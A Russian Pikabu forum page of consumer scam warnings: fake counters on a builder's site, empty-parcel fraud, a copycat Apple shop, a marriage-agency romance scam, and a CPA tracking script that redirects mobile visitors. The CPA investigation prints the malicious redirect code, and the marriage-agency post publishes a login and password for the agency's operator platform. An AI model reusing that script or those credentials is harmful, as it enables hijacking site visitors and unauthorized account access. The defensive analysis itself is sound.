-7

Обман на сайте

Решили мы с женой перебраться из квартиры, и построить дом т.к скоро второй ребенок. И смотря местные сайты наткнулся на такой(не реклама) все у них отлично и столько рекомендаций и много построено домов и такие опытные.

Обман на сайте Обман, Сайт, Длиннопост

Скролим вверх вниз, чтобы цифры пропали. Не обновляя страницу.

И еще.

И все компания обновилась, не одного клиента)))

Дубликаты не найдены

0
Загадочная история Бенджамина Баттона
0

Странно, у меня сайт выглядит иначе...

раскрыть ветку 1
-1
Я с телефона
0

А логотип не замазал... конспиратор прям ;)

раскрыть ветку 2
-1
Отредактировал
-1
Плин
Похожие посты
117

Ответ на пост «Сказочная дура» 

Всем бобра!

Пообещался запилить пост. Когда задумался о написании понял,что "по-хорошему! надо пилить целую серию постов. Вопрос только нужны ли они? Тема-то изжеванная. Да и писать я не очень люблю.

О том как развели моего коллегу.

Входные данные: коллеге под 50 лет, довольно ненаивный человек, строит собственный дом, понадобился ему шуруповерт.

Результат: деньги потрачены - шуруповерта нет.

Как это было. Стал коллега искать где подешевле,нашел сайт(сейчас уже его нет, а тогда на любой запрос "шуруповерт купить" - этот сайт был 1-2 в выдаче Яндекса), продавали шуруповерты,в том числе такой как он себе и искал. На сайте акция - 50%. Оплата - при получении, на почте. Заказал, через 4 дня пришла смс о том, что посылка на почте. Поехал забирать. Пришел на почту, барышня принесла посылку. Подозрения о том, что это кидалово у него были, а тут еще усилились - барышня как-то слишком легко несла и крутила в руках посылку в которой должен был быть шуруповерт. Попросил барышню посмотреть посылку - та отказала. Объяснил, что вскрывать не будет просто в руках подержит(хотел на вес проверить) - отказала, мол оплачивайте потом хоть что с ней делайте. Оплатил, открыл, пусто. На следующий день рассказал мне это. Я посмотрел.

Сайт действительно неплохо оформлен(но в принципе при должном умении можно сваять за день), в выдаче яндекса 1-2 строка, на сайте указанно юр.лицо, и даже владелец юр.лица,женщина. И даже ее профиль легко находился в Вк и не был левым.

Кидок неплохо продуман. Сайт,наличие контактов юр.лица, оплата при получении. По факту - деньги не вернешь и дело не заведешь. Почему? Потому как нет возможности доказать,что это мошенничество. Попробуй докажи, что ты не получили шуруповерт. Ты посылку получил? Получил,вот документы от почты о вручении. А то, что ты потом выкинул/продал/пропил этот шуруповерт никто не виноват. Заказать и сделать видеосъемку получения посылки? Видеосъемка в суде будет являться лишь косвенным доказательством. Да и на суде, если до него даже дошло бы - эта мадам может спокойно заявить что-нибудь вроде: "Я не собиралась никого обманывать,просто очень много заказов вот видимо в спешке случайно отправили пустую посылку, мы готовы вернуть заказчику сумму покупки" . И всё. Вернет сумму. Одному. Все.

Вчера мне звонил этот коллега просил пробить номер телефона. Собрался покупать шины на авто, нашел сайт с подозрительно дешевыми шинами. Я поискал ответы по номеру телефона. Нашел далеко не сразу(да, это очередное кидалово). Причина проста - еще не успели засветиться, как я понял номер начал работать только 29 ноября и отзывов на него еще нет.

Всем хороших покупок и экономьте с умом.

124

Поговорим о брачных агентствах или коротко о том как развели разводил

Небольшая предыстория. Я парень. Действие происходило пару дней назад, я уже забыл когда пролистывал сторис в инстаграме, где была предложена работа что-то вроде оператора самого инстаграма или на подобие этого. Мне нужны были деньги, сижу дома, считаю расходы, и понимаю, что я в финансовой ловушке.
Звонит телефон, беру трубку, голос девушки: вы оставляли заявку в инстаграме по работе в социальных сетях.
Знающие люди, думаю сразу распознают, что это. Но я тогда ответил, мол не помню, но не против узнать больше об этом. Меня пригласили на собеседование.
Приехал. Меня уже насторожило, что офис - это связка выкупленных разных квартир и объединенных в одно помещение с множествами комнат огражденных стеклянными перегородками. Показали, презентацию, вроде не сложно.
На следующий день, я пришел уже в офис, который расположен недалеко от самой штаб квартиры. И админ который меня встретил чтобы провести, немного ввел в курс дела, что мы никого не сводим, нам дали разрешение девушки на то, что мы переписываемся от их имени, они получают процент, получает процент сайт, а также мы, те кто переписываемся. Наша цель: втереться в доверие иностранца, придумывать разные истории и поводы для подарков, за которые ты, получаешь ещё больший процент. Так, за подарок в виде телефона, ты получаешь что-то около или 300 или 400 долларов. Истории разнятся начиная от "дорогой, извини что несколько дней не отвечала, я оставила телефон в такси, звонила им, телефон не нашли, это так ужасно, он был совсем новый, и я до сих пор за него выплачиваю кредит, я не знаю, что мне теперь делать". и после этого, влюбленный иностранец дарит тебе телефон. Вауля, у тебя от 300 долларов, а иностранца развели.
Всё это казалось забавным, мол, иностранцы сами идиоты, что такое позволяют, пока не начало получатся у меня. Я начал общаться с австралийцем, который ко мне относился сперва достаточно скептически, я с ним разговаривал без пошлостей, без всякого подобного, просто о классике, о космосе, о физике, о прошлом и мы так разговорились. Из-за такого разговора,  у меня не плохо поднялся баланс, особенно для новичка. Но этот мужчина, действительно искал себе любовь, у него 7-летний сын, его бросила жена, умер отец, и он  совсем один, да и живет на ферме. И я понимаю, что мужик не раскидывается деньгами, не лох какой-то, а просто ему очень сложно и он совсем один. На следующий день у меня не было никакого желания продолжать, я просто задавал всем глупые вопросы, которые были на грани штрафов сайта, чтобы просто себя повеселить: например я всем рассылал "does not confuse if the girl farts ?😊😄", что значит "не смущает, если девушка пукает ?". Довольно глупо, и забавно. То есть, даже если кто-то и ответит, за что я получу деньги, я не втираюсь в доверие, и понятно всем, что это просто либо дурачество, либо шутка, либо просто девушка дура. В любом случае, я не хотел, чтобы мне отвечали.
В конце дня, у меня снова было ощущение, что я делаю что-то плохое, не честное. Это низко. Все обсуждали, унижались, и говорили о разных способах как привлечь мужское внимание, обсуждали как можно заменить стандартные слова половых органов на те, за что сайт не штрафует. И каждый писал как мог, как можно ниже, чтобы ему за ответ пришло 2 рубля.
В целом, придем к кульминации, я решил что хочу отправить недвусмысленную рассылку. В конце написав запрещенных слов, за которые сам сайт штрафует "агенство"(или контору лохотрона). каждое такое слово от 10 до 20 долларов. Таких сообщений около 300 и рассылка продолжается.

Поговорим о брачных агентствах или коротко о том как развели разводил Брачное агентство, Развод, Обман, Работа, Сайт, Сайт знакомств, Данные, История, Видео, Длиннопост
Поговорим о брачных агентствах или коротко о том как развели разводил Брачное агентство, Развод, Обман, Работа, Сайт, Сайт знакомств, Данные, История, Видео, Длиннопост

Поэтому извините за лексику, это намеренно было.
Затем в нашем офисе был конференц зал,  где проводили собрание, либо по вечерам, собирались админы, кидали частную ссылку на видео каждому. Я сохранил видео. И выложил сам в ютуб, но уже не частную ссылку, а публичную. На видео обсуждают, что нельзя чтобы иностранец как-то виделся с девушкой с анкеты, суммы денег, как разводить, и вообщем внутренние разговоры, коих вы в интернете точно не найдете(напомню, это самые главные, слева в углу директор офиса)

И самое вкусное. Агенство использует сайт Prime Date. Это сайт для работы с разными сайтами знакомств. То есть есть их огромное количество, один владелец, и Prime Date, как база данных, сайт только для "переводчиков", "операторов", называйте как хотите. То есть он изначально разработан, чтобы работать с иностранцами и их разводить. И самое приятное, я успел сменить пароль. И выкладываю данные в сеть. Если кто-то решит сменить пароль и будет интересно, я сделаю новый пост, с скриншотами, функционалом и с чего его едят.
https://prime.date
Почта: 2221OPERATOR@mail.ru
пароль: 54383671

Показать полностью 2 1
3382

Без лоха и жизнь плоха

На сайте фестиваля в исходниках html-страницы был код который отвечал за розыгрыш бесплатных билетов на фестиваль (его быстро убрали). Но скриншоты кода остались.

Без лоха и жизнь плоха Лохотрон, Обман, Сайт, Верстка

При любой отправке формы, показывается сообщение об неудаче.

Перевод сообщения: К сожалению, вы не выиграли билет. В следующий раз повезет! Вы уже использовали свою попытку.

Полная статья: СТАТЬЯ

157

Осторожно! Мошенники. Берегитесь контекстной рекламы apple-ru.net

Вскоре начнется сентябрь - время учёбы, и, как новоиспеченный студент, я захотел выпросить у родителей прикупить себе macbook.

Устав от прочёсывания различных сайтов зашёл отдохнуть на мой любимый сайт pikabu и наткнулся на контекстную рекламу сайта apple-ru.net. Зашел, пригляделся, а цены то на 5-10 деревянных дешевле, чем на маркете!

Осторожно! Мошенники. Берегитесь контекстной рекламы apple-ru.net Обман, Текст, Мошенничество, Macbook, Покупка, Сайт, Отзыв, Whois, Длиннопост
Осторожно! Мошенники. Берегитесь контекстной рекламы apple-ru.net Обман, Текст, Мошенничество, Macbook, Покупка, Сайт, Отзыв, Whois, Длиннопост

"Вау! Здорово!" - подумал я. "Наебалово" - почуяла задница.

С самого начала переживания вашей задницы глушатся отлично выполненным сайтом. Большой каталог, регистрация, много информации, отзывы на маркете (отдельно), чат с консультантом.

Я сразу спросил: "Не мошенники ли вы? Почему цены гораздо ниже, чем у конкурентов?"

В течение 5 минут мне ответили: "У нас нет магазинов, доставка курьером, поэтому цены ниже на 10-20% + у нас в августе еще скидка 10%"

Вроде норм. Открываем отзывы.

И тут у меня появились первые подозрения, нажимаем сортировать по дате и смотрим на ответы магазина.

На предыдущей странице они подписываются:

Команда apple-ru

Теперь:

Ага! Так ведь это отзывы на совершенно другой сайт!! Apple-ru.ru Наши мошенники просто "присосались" к названию и пользуются их отзывами.

Чтобы дальше убедиться в обмане гуглим отзывы сайта "apple-ru.net" и.... я ничего путного найти не смог, то есть сайт не так уж известен, что как бы намекает.

Следующий шаг - смотрим на whois информацию и сравниваем с "оригинальным" сайтом.

Обратите внимания на дату создания - прошлый год

Работает сайт не долго, кидает на левую страницу с отзывами и вообще, если бы не чат с консультантом, сайт выглядит очень и очень мертвым. "Оригинальный сайт" при проверке функционирует с 2011 года.

Мои методы проверки могут быть и не очень верными (уж больно красивый сайт). Если кто может еще способы подсказать - пишите в комментариях. В любом случае сайт какой-то тёмненький, надеюсь, что смог сберечь чьи-то деньги.

Спасибо за внимание и P.S. когда я спросил в чатике сайта о отзывах на маркете, чатик закрылся и больше целый день не появлялся. Не знаю я, что это за web-магия, но факт остается фактом. И в вк я создателя сайта-обманки не нашёл (его имя указано на скриншоте, надеюсь это не считается за разглашение личных данных)

Показать полностью 3
60

Куда ваш сайт редиректит пользователей, а вы об этом даже не подозреваете

Добрый день!

Меня зовут Максим и я директор по продуктам. Эта история началась с того, что однажды я зашел с мобильного телефона на наш сайт и, к своему большому удивлению, был перенаправлен на сайт какой-то интернет-рулетки. Попробовал зайти еще раз – проблема не повторяется, подумал что глюк. Попросил коллег попробовать зайти с мобильного телефона – и волосы встали дыбом. Один «стал миллионным посетителем и выиграл машину», второй – «получил подарочный депозит на форекс», третий был обрадован «ваучером на 50 000 рублей», а многие вообще попали на сайты с нескромно одетыми женщинами, делающими всякое. Для тех кто задумался о том, что может быть причиной, подсказка – сайт не взламывали. Вредоносный код мы добавили сами, пользуясь одним популярным маркетинговым инструментом. Расследование под катом.

Куда ваш сайт редиректит пользователей, а вы об этом даже не подозреваете Сайт, Редирект, Код, CPA, Расследование, Обман, Длиннопост

Проблема

Спонтанные редиректы на сторонние сайты с сомнительным контентом при заходе на наш сайт с мобильных устройств.

Подозрения

-Партнерский js-код

-Встраивание со стороны интернет-провайдеров (парсинг и изменение трафика)

-Проблемы с телефоном, например вирус

Расследование

Проблема воспроизводилась на разных устройствах, в том числе на эмуляторе, а значит дело не в телефоне. Также редирект повторялся у всех операторов и на wi-fi. Значит дело в партнерском коде.

При помощи Chrome DevTools мы эмулировали мобильное устройство и стали пытаться воспроизвести редирект. Поймали! В сетевых логах нашлась уйма странных подгруженных ресурсов. Проверить их содержимое не удалось – при переходе браузер сохраняет пути к файлам, но не их содержимое. Остался только первый переход – storagemoon.com – агрегатор, который выкидывал через цепь редиректов на сомнительные сайты.

Ладно, тогда мы пойдём другим путем.

В консоли браузера вставляем отладочный код:

window.addEventListener("beforeunload", function() { debugger; }, false)

Он отрабатывает при начале перехода на новую страницу. Далее стали заходить на Фоксфорд, вычищая кэш. В очередной раз снова повезло – переход инициировал скрипт по адресу edmp.ru/pix/as_551.js.

Куда ваш сайт редиректит пользователей, а вы об этом даже не подозреваете Сайт, Редирект, Код, CPA, Расследование, Обман, Длиннопост

Сам скрипт затягивался из партнерского кода ElonLeads.

Справедливости ради, с ElonLeads мы уже не работаем несколько месяцев, но после отключения не убрали код ретаргетинга.

Разбор работы этого скрипта для мобильных устройств (скрипт по этому адресу с десктопа выглядит иначе):

При первой загрузке скрипта пользователя перенаправляет по адресу storagemoon.com. Кроме этого, в localStorage записывается под ключом ”MenuIdentifier” следующее время редиректа, а именно ровно через сутки. В течение суток скрипт будет вести себя тихо и никому не мешать.

Однако на бекенде тоже есть какая-то логика. Потому что данный скрипт подгружается только на мобильных, и не всегда в первый раз.

Возможно, каждому 10-му, например, или через какое-то время. Возможно, запоминается IP. Иначе должен быть редирект сразу после очистки localStorage.

Сам код скрипта в читаемом виде:

function() {
function t() {
return !!localStorage.getItem(a)
}
function e() {
o(), parent.top.window.location.href = c
}
function o() {
var t = r + i;
localStorage.setItem(a, t)
}
function n() {
if (t()) {
var o = localStorage.getItem(a);
r > o && e()
} else e()
}
var a = "MenuIdentifier",
r = Math.floor((new Date).getTime() / 1e3),
c = "http://storagemoon.com",
i = 86400;
n()
}();

В дополнение, можно заметить по истории whois, что домен edmp.ru, с которого загружается скрипт, уводящий пользователя в неведомые дали, поменял владельца с ELONLID, LLC на Private Person. Видимо, тогда и начались фокусы.

И, в заключение, партнерский код ElonLeads, затягивающий именно этот edmp.ru/pix/as_551.js:

<script defer="defer" id="elpix">
try {

(function(){
window.elon = {
shop: 4,
user: {{user_id}}
};
var script = document.getElementById('elpix'), as_name = 'as_551', as = document.createElement('script');

Что произошло (на наш взляд)

ElonLeads, CPA сеть, счётчики которой стояли на тысячах сайтов, потеряла (продала?) доступ к домену edmp.ru. С этого домена тянулся js скрипт, который веб-мастера устанавливали на сайт, чтобы присоединиться к CPA сети. Злоумышленники смогли подменить скрипт и продолжают зарабатывать деньги на редиректах на сомнительные сайты. Были ли они в сговоре с ElonLeads – неизвестно. Однако своих партнёров ElonLeads никак не предупредила о смене кода счётчиков. Поэтому, возможно, и с вашего сайта тоже идут редиректы на интернет рулетки и прочий развод.

Надеюсь, эта статья поможет тем, кого в данный момент также обманывают CPA-сети.

Показать полностью 1
5915

Не ведитесь на халяву

Хочу поделиться с вами историей как люди за 70р. готовы удавиться.
Есть сайт Хорошая карта okkarta.ru, на котором размещаются некие купоны дающие скидку на услуги и товары. Решил я значит прикупить себе такой купон, чтобы выгодно помыть машину. До этого пользовался только Биглионом (не реклама), на котором ты сразу оплачиваешь всю стоимость услуги. Какого же было моё удивление, когда я увидел, что на сайте okkarta, за каждый купон просят дополнительно заплатить 70р и еще оплатить стоимость услуги.
Ну да ладно 70р. не такие уж и большие деньги, выбрал способ оплаты, оплатил, деньги успешно списались. Перехожу обратно на сайт, мне пишет оплата не прошла. Звоню в их техподдержку: говорю так и так, деньги списались, а на сайте их нет. Человек на той стороне сразу начал хамить и говорить, чтобы я звонил в свой тупой банк и узнавал там. На вопрос при чем тут банк, если деньги списались, а ваш сайт говорит, что оплата прошла неудачно, мне ответили, что это мои проблемы.
У них на сайте есть возможность оставить отзыв, что я собственно говоря и сделал, кратко описав ситуацию. Не прошло и минуты, как мне перезванивает тот же сотрудник, но уже со своего номера 7-9******* и начинает угрожать расправой, за то, что я оставил отзыв на ИХ сайте, соответственно никто кроме сотрудников отзыв не увидит. Я бросил трубку, но звонки всё продолжались. Тогда я сказал ему, если он не успокоится, то я напишу пост на ПИКАБУ, в трубку раздалось просто дикое гагатание некормленых гиен. Я не стал дослушивать очередные угрозы и добавил номер в ЧС. И весь этот цирк из-за 70р...
Вообщем обходите сайт Хорошая карта стороной и не вздумайте ничего там покупать т.к. оплаты своего купона я так и не дождался, а в банке подтвердили оплату.
Похожие посты закончились. Возможно, вас заинтересуют другие посты по тегам: